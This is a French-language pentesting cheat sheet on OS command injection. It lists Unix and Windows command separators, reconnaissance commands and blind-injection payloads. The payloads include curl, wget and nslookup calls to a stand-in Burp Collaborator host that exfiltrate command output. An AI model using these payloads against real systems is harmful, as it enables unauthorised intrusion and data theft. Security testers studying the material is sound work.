๐ŸšOS injection

Sรฉparateurs de commandes

Unix
Windows

&

&

&&

&&

|

|

||

||

;

n/a

0x0a

n/a

\n

n/a

`<command>`

n/a

$(<command>)

n/a

Commandes basiques pour payloads reflรฉtรฉs

Utilitรฉ
Linux
Windows

Nom de l'utilisateur courant

whoami

whoami

Version du systรจme d'exploitation

uname -a

ver

Config rรฉseau

ifconfig

ipconfig /all

Connexions rรฉseau

netstat -an

netstat -an

Processus actifs

ps -ef

tasklist

En aveugle

Out-Of-Band interaction

||curl+https://your.burp.collab.com/||
||nslookup+your.burp.collab.com||
||wget+https://your.burp.collab.com/||
...

Time based

||sleep+10||
||ping+-c+10+127.0.0.1||

Data exfiltration

||nslookup+`<command>`.your.burp.collab.com||
||curl+https://your.burp.collab.com/`<command>`||
...
PrรฉcรฉdentCRLFSuivantLog4Shell

Derniรจre mise ร  jour